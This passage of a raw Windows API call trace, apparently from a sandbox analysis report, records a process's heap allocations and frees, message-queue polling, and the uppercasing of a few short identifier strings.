| out: hHeap=0x25c0000) returned 1 [0264.117] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0264.117] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1868 [0264.117] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16e8 [0264.118] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17f8 [0264.118] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466db0 [0264.118] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18b8 [0264.118] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa080 [0264.118] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9df8 [0264.118] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1438 [0264.118] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa068 [0264.118] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0264.118] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa068 | out: hHeap=0x25c0000) returned 1 [0264.118] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9df8 | out: hHeap=0x25c0000) returned 1 [0264.118] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa080 | out: hHeap=0x25c0000) returned 1 [0264.118] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0264.118] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17f8 | out: hHeap=0x25c0000) returned 1 [0264.118] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466db0 | out: hHeap=0x25c0000) returned 1 [0264.118] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16e8 | out: hHeap=0x25c0000) returned 1 [0264.118] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0264.118] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7a0 [0264.118] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0264.119] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3bc8 [0264.119] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1868 [0264.119] CharUpperBuffW (in: lpsz="A1300D00639", cchLength=0xb | out: lpsz="A1300D00639") returned 0xb [0264.119] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bc8 | out: hHeap=0x25c0000) returned 1 [0264.119] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0264.119] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa080 [0264.119] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b1868 [0264.119] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9df8 [0264.119] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa068 [0264.119] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16e8 [0264.119] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17f8 [0264.119] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa920 [0264.119] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa128 [0264.119] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18b8 [0264.119] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa9b0 [0264.119] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0264.119] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa9b0 | out: hHeap=0x25c0000) returned 1 [0264.119] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa128 | out: hHeap=0x25c0000) returned 1 [0264.120] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa920 | out: hHeap=0x25c0000) returned 1 [0264.120] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17f8 | out: hHeap=0x25c0000) returned 1 [0264.120] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16e8 | out: hHeap=0x25c0000) returned 1 [0264.120] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa920 [0264.120] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3bc8 [0264.120] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa128 [0264.120] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16e8 [0264.120] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa128 | out: hHeap=0x25c0000) returned 1 [0264.120] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6aa8 [0264.120] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa128 [0264.120] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0264.120] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0264.120] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17f8 [0264.120] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18b8 [0264.120] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa9b0 [0264.120] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cc0 [0264.120] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1438 [0264.120] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9288 [0264.120] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0264.121] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1438 [0264.121] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d28 [0264.121] CharUpperBuffW (in: lpsz="SSA1300D00639", cchLength=0xd | out: lpsz="SSA1300D00639") returned 0xd [0264.121] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d28 | out: hHeap=0x25c0000) returned 1 [0264.121] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0264.121] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9288 | out: hHeap=0x25c0000) returned 1 [0264.121] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cc0 | out: hHeap=0x25c0000) returned 1 [0264.121] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa9b0 | out: hHeap=0x25c0000) returned 1 [0264.121] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0264.121] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17f8 | out: hHeap=0x25c0000) returned 1 [0264.121] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7e0 [0264.121] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0264.121] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7e0 | out: hHeap=0x25c0000) returned 1 [0264.121] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0264.121] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17f8 [0264.121] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa9b0 [0264.121] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cc0 [0264.121] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18b8 [0264.121] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9288 [0264.122] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0264.122] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9288 | out: hHeap=0x25c0000) returned 1 [0264.122] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cc0 | out: hHeap=0x25c0000) returned 1 [0264.122] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa9b0 | out: hHeap=0x25c0000) returned 1 [0264.122] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17f8 | out: hHeap=0x25c0000) returned 1 [0264.122] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17f8 [0264.122] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17f8 | out: hHeap=0x25c0000) returned 1 [0264.122] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0264.122] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0264.122] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa128 | out: hHeap=0x25c0000) returned 1 [0264.122] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6aa8 | out: hHeap=0x25c0000) returned 1 [0264.122] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16e8 | out: hHeap=0x25c0000) returned 1 [0264.122] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bc8 | out: hHeap=0x25c0000) returned 1 [0264.122] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa920 | out: hHeap=0x25c0000) returned 1 [0264.122] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0264.122] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa080 | out: hHeap=0x25c0000) returned 1 [0264.122] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa068 | out: hHeap=0x25c0000) returned 1 [0264.122] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9df8 | out: hHeap=0x25c0000) returned 1 [0264.122] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0264.123] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7a0 | out: hHeap=0x25c0000) returned 1 [0264.123] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0264.123] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d860 | out: hHeap=0x25c0000) returned 1 [0264.123] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0264.123] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3bc8 [0264.123] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1868 [0264.123] CharUpperBuffW (in: lpsz="A610080612A", cchLength=0xb | out: lpsz="A610080612A") returned 0xb [0264.123] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bc8 | out: hHeap=0x25c0000) returned 1 [0264.123] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0264.123] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9df8 [0264.123] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0264.123] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0264.123] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1868 [0264.123] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16e8 [0264.123] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa068 [0264.123] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa080 [0264.123] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17f8 [0264.123] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa920 [0264.123] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17f8 | out: hHeap=0x25c0000) returned 1 [0264.124] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17f8 [0264.124] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3bc8 [0264.124] CharUpperBuffW (in: lpsz="SSA610080612A", cchLength=0xd | out: lpsz="SSA610080612A") returned 0xd [0264.124] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bc8 | out: hHeap=0x25c0000) returned 1 [0264.124] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17f8 | out: hHeap=0x25c0000) returned 1 [0264.124] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa920 | out: hHeap=0x25c0000) returned 1 [0264.124] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa080 | out: hHeap=0x25c0000) returned 1 [0264.124] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa068 | out: hHeap=0x25c0000) returned 1 [0264.124] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16e8 | out: hHeap=0x25c0000) returned 1 [0264.124] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0264.124] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d860 [0264.124] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0264.124] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d860 | out: hHeap=0x25c0000) returned 1 [0264.124] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0264.124] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1868 [0264.124] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa068 [0264.124] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa080 [0264.124] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16e8 [0264.125] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa920 [0264.125] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16e8 | out: hHeap=0x25c0000) returned 1 [0264.125] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa920 | out: hHeap=0x25c0000) returned 1 [0264.125] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa080 | out: hHeap=0x25c0000) returned 1 [0264.125] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa068 | out: hHeap=0x25c0000) returned 1 [0264.125] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0264.125] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1868 [0264.125] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa068 [0264.125] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa080 [0264.125] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16e8 [0264.125] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa920 [0264.125] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16e8 | out: hHeap=0x25c0000) returned 1 [0264.125] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa920 | out: hHeap=0x25c0000) returned 1 [0264.125] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa080 | out: hHeap=0x25c0000) returned 1 [0264.125] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa068 | out: hHeap=0x25c0000) returned 1 [0264.125] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0264.125] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0264.125] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0264.126] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9df8 | out: hHeap=0x25c0000) returned 1 [0264.126] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0264.126] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1868 [0264.126] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0264.126] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8a0 | out: hHeap=0x25c0000) returned 1 [0264.126] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1a0 | out: hHeap=0x25c0000) returned 1 [0264.126] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d00 | out: hHeap=0x25c0000) returned 1 [0264.126] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0264.126] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c60 | out: hHeap=0x25c0000) returned 1 [0264.126] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c18 | out: hHeap=0x25c0000) returned 1 [0264.126] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f60 | out: hHeap=0x25c0000) returned 1 [0264.126] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9420 | out: hHeap=0x25c0000) returned 1 [0264.126] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aaec0 | out: hHeap=0x25c0000) returned 1 [0264.126] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0e0 | out: hHeap=0x25c0000) returned 1 [0264.126] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa740 | out: hHeap=0x25c0000) returned 1 [0264.126] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0264.126] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0264.126] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a04b0 | out: hHeap=0x25c0000) returned 1 [0264.126] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0f8 | out: hHeap=0x25c0000) returned 1 [0264.126] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a58 | out: hHeap=0x25c0000) returned 1 [0264.127] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0264.127] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a08 | out: hHeap=0x25c0000) returned 1 [0264.127] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fd8 | out: hHeap=0x25c0000) returned 1 [0264.127] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a80 | out: hHeap=0x25c0000) returned 1 [0264.127] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0264.127] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6468 | out: hHeap=0x25c0000) returned 1 [0264.127] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acc60 | out: hHeap=0x25c0000) returned 1 [0264.127] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0264.127] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d860 [0264.127] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0264.127] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0264.127] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0264.127] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e10 [0264.127] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0264.127] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0264.127] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0264.127] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7a0 [0264.127] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0264.127] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0264.128] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6468 [0264.128] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16c8 [0264.128] CharUpperBuffW (in: lpsz="A4E00301934", cchLength=0xb | out: lpsz="A4E00301934") returned 0xb [0264.128] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6468 | out: hHeap=0x25c0000) returned 1 [0264.128] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0264.128] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acc60 [0264.128] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b16c8 [0264.128] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fd8 [0264.128] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0f8 [0264.128] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2c18 [0264.128] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa740 [0264.128] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0264.128] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b2c18 [0264.128] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0e0 [0264.128] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0264.128] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0264.128] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aaec0 [0264.128] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6468 [0264.129] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9420 [0264.129] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2ba8 [0264.129] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9420 | out: hHeap=0x25c0000) returned 1 [0264.129] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a80 [0264.129] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9420 [0264.129] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f60 [0264.129] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a08 [0264.129] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c18 [0264.129] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1868 [0264.129] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c18 | out: hHeap=0x25c0000) returned 1 [0264.129] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a58 [0264.129] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c18 [0264.129] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1a0 [0264.129] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9df8 [0264.129] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa068 [0264.129] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa080 [0264.129] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16e8 [0264.129] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16e8 | out: hHeap=0x25c0000) returned 1 [0264.129] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c60 [0264.130] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa920 [0264.130] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, 